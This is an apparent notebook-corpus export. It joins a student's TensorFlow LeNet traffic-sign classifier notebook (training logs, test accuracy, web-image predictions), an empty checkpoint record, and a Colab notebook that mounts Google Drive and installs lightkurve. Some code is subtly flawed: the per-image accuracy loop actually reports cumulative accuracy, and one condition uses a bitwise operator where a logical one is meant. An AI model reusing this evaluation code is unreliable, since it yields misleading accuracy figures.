"----\n\n## Step 2: Design and Test a Model Architecture\n\nDesign and implement a deep learning model that learns to recognize traffic signs. Train and test your model on the [German Traffic Sign Dataset](http://benchmark.ini.rub.de/?section=gtsrb&subsection=dataset).\n\nThe LeNet-5 implementation shown in the [classroom](https://classroom.udacity.com/nanodegrees/nd013/parts/fbf77062-5703-404e-b60c-95b78b2f3f9e/modules/6df7ae49-c61c-4bb2-a23e-6527e69209ec/lessons/601ae704-1035-4287-8b11-e2c2716217ad/concepts/d4aca031-508f-4e0b-b493-e7b706120f81) at the end of the CNN lesson is a solid starting point. You'll have to change the number of classes and possibly the preprocessing, but aside from that it's plug and play! \n\nWith the LeNet-5 solution from the lecture, you should expect a validation set accuracy of about 0.89. To meet specifications, the validation set accuracy will need to be at least 0.93. It is possible to get an even higher accuracy, but 0.93 is the minimum for a successful project submission. \n\nThere are various aspects to consider when thinking about this problem:\n\n- Neural network architecture (is the network over or underfitting?)\n- Play around preprocessing techniques (normalization, rgb to grayscale, etc)\n- Number of examples per label (some have more than others).\n- Generate fake data.\n\nHere is an example of a [published baseline model on this problem](http://yann.lecun.com/exdb/publis/pdf/sermanet-ijcnn-11.pdf). It's not required to be familiar with the approach used in the paper but, it's good practice to try to read papers like these.",
"_____no_output_____"
],
[
"### Pre-process the Data Set (normalization, grayscale, etc.)",
"_____no_output_____"
],
[
"Minimally, the image data should be normalized so that the data has mean zero and equal variance. For image data, `(pixel - 128)/ 128` is a quick way to approximately normalize the data and can be used in this project. \n\nOther pre-processing steps are optional. You can try different techniques to see if it improves performance. \n\nUse the code cell (or multiple code cells, if necessary) to implement the first step of your project.",
"_____no_output_____"
]
],
[
[
"'''\nimport cv2\ndef rotateImageRandomly(img):\n c_x,c_y = int(img.shape[0]/2), int(img.shape[1]/2)\n ang = 30.0*np.random.rand()-15\n Mat = cv2.getRotationMatrix2D((c_x, c_y), ang, 1.0)\n return cv2.warpAffine(img, Mat, img.shape[:2])\n\ndef linearImageTransformation(img,s=1.0,m=0.0):\n img2=cv2.multiply(img, np.array([s]))\n return cv2.add(img2, np.array([m]))\n\ndef changeImageContrast(img, s=1.0):\n m=127.0*(1.0-s)\n return linearImageTransformation(img, s, m)\n\ndef makeAugmentation(img):\n img = img.copy()\n img = changeImageContrast(img, 1.8*np.random.rand()+0.2)\n img = rotateImageRandomly(img)\n\n return img\n\nX_train_transformed = list()\ny_train_transformed = list()\nfor i in range(X_train.shape[0]):\n img = X_train[i]\n label = y_train[i]\n for j in range(100):\n imgout = makeAugmentation(img)\n X_train_transformed.append(imgout)\n y_train_transformed.append(label)\nX_train_transformed = np.concatenate(X_train_transformed,axis=0)\ny_train_transformed = np.array(y_train_transformed)\n'''",
"_____no_output_____"
],
[
"### Preprocess the data here. It is required to normalize the data. Other preprocessing steps could include \n### converting to grayscale, etc.\n### Feel free to use as many code cells as needed.\n\nX_train = np.sum(X_train/3, axis=3, keepdims=True)\n\nX_test = np.sum(X_test/3, axis=3, keepdims=True)\n\nX_valid = np.sum(X_valid/3, axis=3, keepdims=True)\n\nX_train = (X_train-128)/128\nX_test = (X_test-128)/128\nX_valid = (X_valid-128)/128",
"_____no_output_____"
]
],
[
[
"### Model Architecture",
"_____no_output_____"
]
],
[
[
"### Define your architecture here.\n### Feel free to use as many code cells as needed.\nfrom sklearn.utils import shuffle\nimport tensorflow as tf\nEPOCHS = 40\nBATCH_SIZE = 128\n",
"_____no_output_____"
],
[
"from tensorflow.contrib.layers import flatten\ndef LeNet(x): \n # Arguments used for tf.truncated_normal, randomly defines variables for the weights and biases for each layer\n mu = 0\n sigma = 0.1\n\n # SOLUTION: Layer 1: Convolutional. Input = 32x32x1. Output = 28x28x6.\n conv1_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 1, 6), mean = mu, stddev = sigma))\n conv1_b = tf.Variable(tf.zeros(6))\n conv1 = tf.nn.conv2d(x, conv1_W, strides=[1, 1, 1, 1], padding='VALID') + conv1_b\n\n # SOLUTION: Activation.\n conv1 = tf.nn.relu(conv1)\n\n # SOLUTION: Pooling. Input = 28x28x6. Output = 14x14x6.\n conv1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # SOLUTION: Layer 2: Convolutional. Output = 10x10x16.\n conv2_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16), mean = mu, stddev = sigma))\n conv2_b = tf.Variable(tf.zeros(16))\n conv2 = tf.nn.conv2d(conv1, conv2_W, strides=[1, 1, 1, 1], padding='VALID') + conv2_b\n\n # SOLUTION: Activation.\n conv2 = tf.nn.relu(conv2)\n\n # SOLUTION: Pooling. Input = 10x10x16. Output = 5x5x16.\n conv2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n \n #1x1 convolution\n \n\n # SOLUTION: Flatten. Input = 5x5x16. Output = 400.\n fc0 = flatten(conv2)\n \n \n \n\n # SOLUTION: Layer 3: Fully Connected. Input = 400. Output = 120.\n fc1_W = tf.Variable(tf.truncated_normal(shape=(400,120), mean = mu, stddev = sigma))\n fc1_b = tf.Variable(tf.zeros(120))\n fc1 = tf.matmul(fc0, fc1_W) + fc1_b\n\n # SOLUTION: Activation.\n fc1 = tf.nn.relu(fc1)\n\n # SOLUTION: Layer 4: Fully Connected. Input = 120. Output = 84.\n fc2_W = tf.Variable(tf.truncated_normal(shape=(120, 84), mean = mu, stddev = sigma))\n fc2_b = tf.Variable(tf.zeros(84))\n fc2 = tf.matmul(fc1, fc2_W) + fc2_b\n\n # SOLUTION: Activation.\n fc2 = tf.nn.relu(fc2)\n\n # SOLUTION: Layer 5: Fully Connected. Input = 84. Output = 10.\n fc3_W = tf.Variable(tf.truncated_normal(shape=(84, 43), mean = mu, stddev = sigma))\n fc3_b = tf.Variable(tf.zeros(43))\n logits = tf.matmul(fc2, fc3_W) + fc3_b\n\n return logits",
"_____no_output_____"
]
],
[
[
"### Train, Validate and Test the Model",
"_____no_output_____"
],
[
"A validation set can be used to assess how well the model is performing. A low accuracy on the training and validation\nsets imply underfitting. A high accuracy on the training set but low accuracy on the validation set implies overfitting.",
"_____no_output_____"
]
],
[
[
"### Train your model here.\n### Calculate and report the accuracy on the training and validation set.\n### Once a final model architecture is selected, \n### the accuracy on the test set should be calculated and reported as well.\n### Feel free to use as many code cells as needed.\nrate = 0.001\n\nx = tf.placeholder(tf.float32, (None, 32, 32, 1))\ny = tf.placeholder(tf.int32, (None))\none_hot_y = tf.one_hot(y, 43)\n\n\n\nlogits = LeNet(x)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits)\nloss_operation = tf.reduce_mean(cross_entropy)\noptimizer = tf.train.AdamOptimizer(learning_rate = rate)\ntraining_operation = optimizer.minimize(loss_operation)\n\n#EVALUATION\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))\naccuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nsaver = tf.train.Saver()\n\ndef evaluate(X_data, y_data):\n num_examples = len(X_data)\n total_accuracy = 0\n sess = tf.get_default_session()\n for offset in range(0, num_examples, BATCH_SIZE):\n batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]\n accuracy = sess.run(accuracy_operation, feed_dict={x: batch_x, y: batch_y})\n total_accuracy += (accuracy * len(batch_x))\n return total_accuracy / num_examples",
"_____no_output_____"
],
[
"with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n num_examples = len(X_train)\n \n print(\"Training...\")\n print()\n for i in range(EPOCHS):\n X_train, y_train = shuffle(X_train, y_train)\n for offset in range(0, num_examples, BATCH_SIZE):\n end = offset + BATCH_SIZE\n batch_x, batch_y = X_train[offset:end], y_train[offset:end]\n sess.run(training_operation, feed_dict={x: batch_x, y: batch_y})\n \n validation_accuracy = evaluate(X_valid, y_valid)\n print(\"EPOCH {} ...\".format(i+1))\n print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n print()\n \n saver.save(sess, './lenet')\n print(\"Model saved\")",
"Training...\n\nEPOCH 1 ...\nValidation Accuracy = 0.743\n\nEPOCH 2 ...\nValidation Accuracy = 0.832\n\nEPOCH 3 ...\nValidation Accuracy = 0.880\n\nEPOCH 4 ...\nValidation Accuracy = 0.891\n\nEPOCH 5 ...\nValidation Accuracy = 0.874\n\nEPOCH 6 ...\nValidation Accuracy = 0.897\n\nEPOCH 7 ...\nValidation Accuracy = 0.921\n\nEPOCH 8 ...\nValidation Accuracy = 0.903\n\nEPOCH 9 ...\nValidation Accuracy = 0.908\n\nEPOCH 10 ...\nValidation Accuracy = 0.912\n\nEPOCH 11 ...\nValidation Accuracy = 0.918\n\nEPOCH 12 ...\nValidation Accuracy = 0.927\n\nEPOCH 13 ...\nValidation Accuracy = 0.932\n\nEPOCH 14 ...\nValidation Accuracy = 0.924\n\nEPOCH 15 ...\nValidation Accuracy = 0.910\n\nEPOCH 16 ...\nValidation Accuracy = 0.927\n\nEPOCH 17 ...\nValidation Accuracy = 0.926\n\nEPOCH 18 ...\nValidation Accuracy = 0.932\n\nEPOCH 19 ...\nValidation Accuracy = 0.930\n\nEPOCH 20 ...\nValidation Accuracy = 0.933\n\nEPOCH 21 ...\nValidation Accuracy = 0.947\n\nEPOCH 22 ...\nValidation Accuracy = 0.939\n\nEPOCH 23 ...\nValidation Accuracy = 0.943\n\nEPOCH 24 ...\nValidation Accuracy = 0.939\n\nEPOCH 25 ...\nValidation Accuracy = 0.941\n\nEPOCH 26 ...\nValidation Accuracy = 0.944\n\nEPOCH 27 ...\nValidation Accuracy = 0.950\n\nEPOCH 28 ...\nValidation Accuracy = 0.949\n\nEPOCH 29 ...\nValidation Accuracy = 0.943\n\nEPOCH 30 ...\nValidation Accuracy = 0.938\n\nEPOCH 31 ...\nValidation Accuracy = 0.941\n\nEPOCH 32 ...\nValidation Accuracy = 0.915\n\nEPOCH 33 ...\nValidation Accuracy = 0.935\n\nEPOCH 34 ...\nValidation Accuracy = 0.948\n\nEPOCH 35 ...\nValidation Accuracy = 0.950\n\nEPOCH 36 ...\nValidation Accuracy = 0.950\n\nEPOCH 37 ...\nValidation Accuracy = 0.954\n\nEPOCH 38 ...\nValidation Accuracy = 0.949\n\nEPOCH 39 ...\nValidation Accuracy = 0.951\n\nEPOCH 40 ...\nValidation Accuracy = 0.951\n\nModel saved\n"
],
[
"with tf.Session() as sess:\n saver.restore(sess, tf.train.latest_checkpoint('.'))\n\n train_accuracy = evaluate(X_train, y_train)\n print(\"Train Accuracy = {:.3f}\".format(train_accuracy))\n \n valid_accuracy = evaluate(X_valid, y_valid)\n print(\"Valid Accuracy = {:.3f}\".format(valid_accuracy)) \n \n test_accuracy = evaluate(X_test, y_test)\n print(\"Test Accuracy = {:.3f}\".format(test_accuracy))",
"INFO:tensorflow:Restoring parameters from ./lenet\nTrain Accuracy = 1.000\nValid Accuracy = 0.951\nTest Accuracy = 0.919\n"
]
],
[
[
"---\n\n## Step 3: Test a Model on New Images\n\nTo give yourself more insight into how your model is working, download at least five pictures of German traffic signs from the web and use your model to predict the traffic sign type.\n\nYou may find `signnames.csv` useful as it contains mappings from the class id (integer) to the actual sign name.",
"_____no_output_____"
]
],
[
[
"import glob\nimport cv2\nimport numpy as np\nname_values = np.genfromtxt('signnames.csv', skip_header=1, dtype=[('myint','i8'), ('mysring','S55')], delimiter=',')\nmy_images = sorted(glob.glob('./test_images/*.png'))\nmy_labels = np.array([1, 22, 35,2, 37, 18])\n\nfigures = {}\nlabels = {}\nmy_signs = []\nindex = 0\ndef plot_figures(figures, nrows = 1, ncols=1, labels=None):\n fig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(12, 14))\n axs = axs.ravel()\n for index, title in zip(range(len(figures)), figures):\n axs[index].imshow(figures[title], plt.gray())\n if(labels != None):\n axs[index].set_title(labels[index])\n else:\n axs[index].set_title(title)\n \n axs[index].set_axis_off()\n \n plt.tight_layout()\nfor my_image in my_images:\n img = cv2.cvtColor(cv2.imread(my_image), cv2.COLOR_BGR2RGB)\n my_signs.append(img)\n figures[index] = img\n labels[index] = name_values[my_labels[index]][1].decode('ascii')\n index += 1\n\nplot_figures(figures, 3, 2, labels)",
"_____no_output_____"
],
[
"my_signs = np.array(my_signs)\nmy_signs = np.sum(my_signs/3, axis=3, keepdims=True)\nmy_signs = (my_signs-128)/128\n\nnumber_to_stop = 6\nfigures = {}\nlabels = {}\nfor i in range(number_to_stop):\n labels[i] = name_values[my_labels[i]][1].decode('ascii')\n figures[i] = my_signs[i].squeeze()\n \nplot_figures(figures, 3, 2, labels)",
"_____no_output_____"
]
],
[
[
"### Load and Output the Images",
"_____no_output_____"
]
],
[
[
"### Load the images and plot them here.\n### Feel free to use as many code cells as needed.",
"_____no_output_____"
]
],
[
[
"### Predict the Sign Type for Each Image",
"_____no_output_____"
]
],
[
[
"### Run the predictions here and use the model to output the prediction for each image.\n### Make sure to pre-process the images with the same pre-processing pipeline used earlier.\n### Feel free to use as many code cells as needed.\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n# saver = tf.train.import_meta_graph('./lenet.meta')\n saver.restore(sess, \"./lenet\")\n my_accuracy = evaluate(my_signs, my_labels)\n print(\"My Data Set Accuracy = {:.3f}\".format(my_accuracy))",
"INFO:tensorflow:Restoring parameters from ./lenet\nMy Data Set Accuracy = 0.833\n"
]
],
[
[
"### Analyze Performance",
"_____no_output_____"
]
],
[
[
"### Calculate the accuracy for these 5 new images. \n### For example, if the model predicted 1 out of 5 signs correctly, it's 20% accurate on these new images.\nmy_single_item_array = []\nmy_single_item_label_array = []\n\nfor i in range(6):\n my_single_item_array.append(my_signs[i])\n my_single_item_label_array.append(my_labels[i])\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n# saver = tf.train.import_meta_graph('./lenet.meta')\n saver.restore(sess, \"./lenet\")\n my_accuracy = evaluate(my_single_item_array, my_single_item_label_array)\n print('Image {}'.format(i+1))\n print(\"Image Accuracy = {:.3f}\".format(my_accuracy))\n print()",
"INFO:tensorflow:Restoring parameters from ./lenet\nImage 1\nImage Accuracy = 1.000\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 2\nImage Accuracy = 1.000\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 3\nImage Accuracy = 1.000\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 4\nImage Accuracy = 0.750\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 5\nImage Accuracy = 0.800\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 6\nImage Accuracy = 0.833\n\n"
]
],
[
[
"### Output Top 5 Softmax Probabilities For Each Image Found on the Web",
"_____no_output_____"
],
[
"For each of the new images, print out the model's softmax probabilities to show the **certainty** of the model's predictions (limit the output to the top 5 probabilities for each image). [`tf.nn.top_k`](https://www.tensorflow.org/versions/r0.12/api_docs/python/nn.html#top_k) could prove helpful here. \n\nThe example below demonstrates how tf.nn.top_k can be used to find the top k predictions for each image.\n\n`tf.nn.top_k` will return the values and indices (class ids) of the top k predictions. So if k=3, for each sign, it'll return the 3 largest probabilities (out of a possible 43) and the correspoding class ids.\n\nTake this numpy array as an example. The values in the array represent predictions. The array contains softmax probabilities for five candidate images with six possible classes. `tf.nn.top_k` is used to choose the three classes with the highest probability:\n\n```\n# (5, 6) array\na = np.array([[ 0.24879643, 0.07032244, 0.12641572, 0.34763842, 0.07893497,\n 0.12789202],\n [ 0.28086119, 0.27569815, 0.08594638, 0.0178669 , 0.18063401,\n 0.15899337],\n [ 0.26076848, 0.23664738, 0.08020603, 0.07001922, 0.1134371 ,\n 0.23892179],\n [ 0.11943333, 0.29198961, 0.02605103, 0.26234032, 0.1351348 ,\n 0.16505091],\n [ 0.09561176, 0.34396535, 0.0643941 , 0.16240774, 0.24206137,\n 0.09155967]])\n```\n\nRunning it through `sess.run(tf.nn.top_k(tf.constant(a), k=3))` produces:\n\n```\nTopKV2(values=array([[ 0.34763842, 0.24879643, 0.12789202],\n [ 0.28086119, 0.27569815, 0.18063401],\n [ 0.26076848, 0.23892179, 0.23664738],\n [ 0.29198961, 0.26234032, 0.16505091],\n [ 0.34396535, 0.24206137, 0.16240774]]), indices=array([[3, 0, 5],\n [0, 1, 4],\n [0, 5, 1],\n [1, 3, 5],\n [1, 4, 3]], dtype=int32))\n```\n\nLooking just at the first row we get `[ 0.34763842, 0.24879643, 0.12789202]`, you can confirm these are the 3 largest probabilities in `a`. You'll also notice `[3, 0, 5]` are the corresponding indices.",
"_____no_output_____"
]
],
[
[
"### Print out the top five softmax probabilities for the predictions on the German traffic sign images found on the web. \n### Feel free to use as many code cells as needed.",
"_____no_output_____"
]
],
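[
[
"The code cell above was left unanswered. A sketch of how the top five probabilities could be computed for the web images with the graph already defined (it reuses `logits`, `x`, `saver` and `my_signs` from earlier cells):\n\n```\nsoftmax_probs = tf.nn.softmax(logits)\ntop_k_op = tf.nn.top_k(softmax_probs, k=5)\nwith tf.Session() as sess:\n    saver.restore(sess, \"./lenet\")\n    values, indices = sess.run(top_k_op, feed_dict={x: my_signs})\nprint(values)   # top-5 probabilities for each image\nprint(indices)  # the corresponding class ids\n```",
"_____no_output_____"
]
],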
[
[
"### Project Writeup\n\nOnce you have completed the code implementation, document your results in a project writeup using this [template](https://github.com/udacity/CarND-Traffic-Sign-Classifier-Project/blob/master/writeup_template.md) as a guide. The writeup can be in a markdown or pdf file. ",
"_____no_output_____"
],
[
"> **Note**: Once you have completed all of the code implementations and successfully answered each question above, you may finalize your work by exporting the iPython Notebook as an HTML document. You can do this by using the menu above and navigating to \\n\",\n \"**File -> Download as -> HTML (.html)**. Include the finished document along with this notebook as your submission.",
"_____no_output_____"
],
[
"---\n\n## Step 4 (Optional): Visualize the Neural Network's State with Test Images\n\n This Section is not required to complete but acts as an additional excersise for understaning the output of a neural network's weights. While neural networks can be a great learning device they are often referred to as a black box. We can understand what the weights of a neural network look like better by plotting their feature maps. After successfully training your neural network you can see what it's feature maps look like by plotting the output of the network's weight layers in response to a test stimuli image. From these plotted feature maps, it's possible to see what characteristics of an image the network finds interesting. For a sign, maybe the inner network feature maps react with high activation to the sign's boundary outline or to the contrast in the sign's painted symbol.\n\n Provided for you below is the function code that allows you to get the visualization output of any tensorflow weight layer you want. The inputs to the function should be a stimuli image, one used during training or a new one you provided, and then the tensorflow variable name that represents the layer's state during the training process, for instance if you wanted to see what the [LeNet lab's](https://classroom.udacity.com/nanodegrees/nd013/parts/fbf77062-5703-404e-b60c-95b78b2f3f9e/modules/6df7ae49-c61c-4bb2-a23e-6527e69209ec/lessons/601ae704-1035-4287-8b11-e2c2716217ad/concepts/d4aca031-508f-4e0b-b493-e7b706120f81) feature maps looked like for it's second convolutional layer you could enter conv2 as the tf_activation variable.\n\nFor an example of what feature map outputs look like, check out NVIDIA's results in their paper [End-to-End Deep Learning for Self-Driving Cars](https://devblogs.nvidia.com/parallelforall/deep-learning-self-driving-cars/) in the section Visualization of internal CNN State. NVIDIA was able to show that their network's inner weights had high activations to road boundary lines by comparing feature maps from an image with a clear path to one without. Try experimenting with a similar test to show that your trained network's weights are looking for interesting features, whether it's looking at differences in feature maps from images with or without a sign, or even what feature maps look like in a trained network vs a completely untrained one on the same sign image.\n\n<figure>\n <img src=\"visualize_cnn.png\" width=\"380\" alt=\"Combined Image\" />\n <figcaption>\n <p></p> \n <p style=\"text-align: center;\"> Your output should look something like this (above)</p> \n </figcaption>\n</figure>\n <p></p> \n",
"_____no_output_____"
]
],
[
[
"### Visualize your network's feature maps here.\n### Feel free to use as many code cells as needed.\n\n# image_input: the test image being fed into the network to produce the feature maps\n# tf_activation: should be a tf variable name used during your training procedure that represents the calculated state of a specific weight layer\n# activation_min/max: can be used to view the activation contrast in more detail, by default matplot sets min and max to the actual min and max values of the output\n# plt_num: used to plot out multiple different weight feature map sets on the same block, just extend the plt number for each new feature map entry\n\ndef outputFeatureMap(image_input, tf_activation, activation_min=-1, activation_max=-1 ,plt_num=1):\n # Here make sure to preprocess your image_input in a way your network expects\n # with size, normalization, ect if needed\n # image_input =\n # Note: x should be the same name as your network's tensorflow data placeholder variable\n # If you get an error tf_activation is not defined it may be having trouble accessing the variable from inside a function\n activation = tf_activation.eval(session=sess,feed_dict={x : image_input})\n featuremaps = activation.shape[3]\n plt.figure(plt_num, figsize=(15,15))\n for featuremap in range(featuremaps):\n plt.subplot(6,8, featuremap+1) # sets the number of feature maps to show on each row and column\n plt.title('FeatureMap ' + str(featuremap)) # displays the feature map number\n if activation_min != -1 & activation_max != -1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmin =activation_min, vmax=activation_max, cmap=\"gray\")\n elif activation_max != -1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmax=activation_max, cmap=\"gray\")\n elif activation_min !=-1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmin=activation_min, cmap=\"gray\")\n else:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", cmap=\"gray\")",
"_____no_output_____"
]
]
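,
[
[
"The function above is never called in this notebook. Invoking it needs a handle on a layer tensor, and `conv1` is local to `LeNet()`, so the call below is hypothetical: it assumes the model were refactored to expose that tensor (named `conv1_tensor` here purely for illustration):\n\n```\nwith tf.Session() as sess:\n    saver.restore(sess, \"./lenet\")\n    outputFeatureMap(my_signs[0:1], conv1_tensor)  # feature maps for one test image\n```",
"_____no_output_____"
]
]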
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
]
] |
e706dedce3d41db086daab2a673d202d9f84d66f | 37,547 | ipynb | Jupyter Notebook | TensorNetworks/.ipynb_checkpoints/Try Include-checkpoint.ipynb | BlackBodyRadiation/JupyterTNN | 9f3c207fdff32ce68e791a8cedab9da7cbe37fee | [
"MIT"
] | null | null | null | TensorNetworks/.ipynb_checkpoints/Try Include-checkpoint.ipynb | BlackBodyRadiation/JupyterTNN | 9f3c207fdff32ce68e791a8cedab9da7cbe37fee | [
"MIT"
] | null | null | null | TensorNetworks/.ipynb_checkpoints/Try Include-checkpoint.ipynb | BlackBodyRadiation/JupyterTNN | 9f3c207fdff32ce68e791a8cedab9da7cbe37fee | [
"MIT"
] | null | null | null | 481.371795 | 35,778 | 0.942765 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
e706e64177d45c859c909ec93e84c04ea3d5ea17 | 32,036 | ipynb | Jupyter Notebook | Interns/Sarah/How_to_access_our_shared_data_folder.ipynb | sarahrdk/EscapeEarth | 76dd2df6671aa6c193aa528a344407df0a5457aa | [
"MIT"
] | null | null | null | Interns/Sarah/How_to_access_our_shared_data_folder.ipynb | sarahrdk/EscapeEarth | 76dd2df6671aa6c193aa528a344407df0a5457aa | [
"MIT"
] | null | null | null | Interns/Sarah/How_to_access_our_shared_data_folder.ipynb | sarahrdk/EscapeEarth | 76dd2df6671aa6c193aa528a344407df0a5457aa | [
"MIT"
] | null | null | null | 46.836257 | 392 | 0.475434 | [
[
[
"<a href=\"https://colab.research.google.com/github/sarahrdk/EscapeEarth/blob/main/Interns/Sarah/How_to_access_our_shared_data_folder.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# __How to mount our google drive__ \n#### so we can open the data in our shared EscapeEarthData folder.",
"_____no_output_____"
]
],
[
[
"# this cell mounts your drive but you also must follow these\n# STEPS:\n# 1) run this cell and a url will display that you should click on\n# 2) select your google account if applicable\n# 3) click 'Allow' when asked by 'Google Drive File Stream wants to access your Google Account'\n# 4) click on the copy icon next to the code displayed\n# 5) paste that code into the below cell prompt 'Enter your authorization code:'\n# 6) hit the Enter key and wait\n# 7) successful mounting is indicated by the statement 'Mounted at /content/gdrive'\n\nfrom google.colab import drive\n\ndrive.mount('/content/gdrive')",
"Mounted at /content/gdrive\n"
],
[
"# this cell lists what's in your google drive \n# you should see the shared 'EscapeEarthData' folder\n!ls /content/gdrive/My\\ Drive",
"amnh EscapeEarthData Files imovis other\n"
]
],
[
[
"#### _IF_ you get an error __\"ls: cannot access '/content/gdrive/My Drive': Transport endpoint is not connected\"__ you need to remount your drive. Copy/Paste the below code into a new cell to do so:\n\n\n\n```\nfrom google.colab import drive\ndrive.mount('/content/gdrive', force_remount=True)\n```\n\n#### _Otherwise_, you may proceed but be aware of this issue as it can arise at any time.",
"_____no_output_____"
]
],
[
[
"# we can also list the contents of our shared folder \n# (once i add more data this wont be a good thing to do tho)\n!ls /content/gdrive/My\\ Drive/EscapeEarthData",
"1161345_lc.csv\t2161623_lc.csv\tbls_powers.npy\tdf8.csv\n1573836_lc.csv\tActivity-2\tbls_rps.npy\n"
]
],
[
[
"# __How to Open Data Files__ \n#### Before we can open these files we will need to import, _and/or_ install then import, packages & their dependencies ",
"_____no_output_____"
]
],
[
[
"# import dependencies\nimport numpy as np\nimport pandas as pd\n# example of an installation then import (we'll need this later)\n!pip install lightkurve\nimport lightkurve as lk",
"Collecting lightkurve\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/6b/cb/a2917205537f6bad53b109365e09abe946afbf5d8a4e1f46c3f75abcb398/lightkurve-1.11.3-py3-none-any.whl (515kB)\n\u001b[K |████████████████████████████████| 522kB 2.8MB/s \n\u001b[?25hCollecting astroquery>=0.3.9\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/1b/f8/4690523783691ed816b3469c3ec611af3798594d37ade510dd918d59f57e/astroquery-0.4.1.tar.gz (6.5MB)\n\u001b[K |████████████████████████████████| 6.5MB 8.5MB/s \n\u001b[?25hRequirement already satisfied: astropy>=1.3 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (4.0.1.post1)\nRequirement already satisfied: patsy>=0.5.1 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (0.5.1)\nRequirement already satisfied: requests in /usr/local/lib/python3.6/dist-packages (from lightkurve) (2.23.0)\nCollecting uncertainties\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/b0/e0/fc200da8190729dcb685ae4877ed6936d31d64aeccb8cc355d9ec982681d/uncertainties-3.1.4-py2.py3-none-any.whl (246kB)\n\u001b[K |████████████████████████████████| 256kB 29.5MB/s \n\u001b[?25hRequirement already satisfied: numpy>=1.11 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (1.18.5)\nCollecting fbpca>=1.0\n Downloading https://files.pythonhosted.org/packages/a7/a5/2085d0645a4bb4f0b606251b0b7466c61326e4a471d445c1c3761a2d07bc/fbpca-1.0.tar.gz\nRequirement already satisfied: pandas in /usr/local/lib/python3.6/dist-packages (from lightkurve) (1.1.2)\nRequirement already satisfied: matplotlib>=1.5.3 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (3.2.2)\nRequirement already satisfied: bs4 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (0.0.1)\nCollecting scipy!=1.4.0,!=1.4.1,>=0.19.0\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/2b/a8/f4c66eb529bb252d50e83dbf2909c6502e2f857550f22571ed8556f62d95/scipy-1.5.2-cp36-cp36m-manylinux1_x86_64.whl (25.9MB)\n\u001b[K |████████████████████████████████| 25.9MB 130kB/s \n\u001b[?25hCollecting oktopus\n Downloading https://files.pythonhosted.org/packages/2d/6e/7b7e11442ff70286c22614d200f6145f83528dc6c99fec0982665e25c8d3/oktopus-0.1.2.tar.gz\nRequirement already satisfied: tqdm>=4.25.0 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (4.41.1)\nCollecting keyring>=4.0\n Downloading https://files.pythonhosted.org/packages/e4/ed/7be20815f248b0d6aae406783c2bee392640924623c4e17b50ca90c7f74d/keyring-21.4.0-py3-none-any.whl\nRequirement already satisfied: beautifulsoup4>=4.3.2 in /usr/local/lib/python3.6/dist-packages (from astroquery>=0.3.9->lightkurve) (4.6.3)\nRequirement already satisfied: html5lib>=0.999 in /usr/local/lib/python3.6/dist-packages (from astroquery>=0.3.9->lightkurve) (1.0.1)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from astroquery>=0.3.9->lightkurve) (1.15.0)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->lightkurve) (3.0.4)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->lightkurve) (2.10)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests->lightkurve) (1.24.3)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->lightkurve) (2020.6.20)\nRequirement already satisfied: future in /usr/local/lib/python3.6/dist-packages (from 
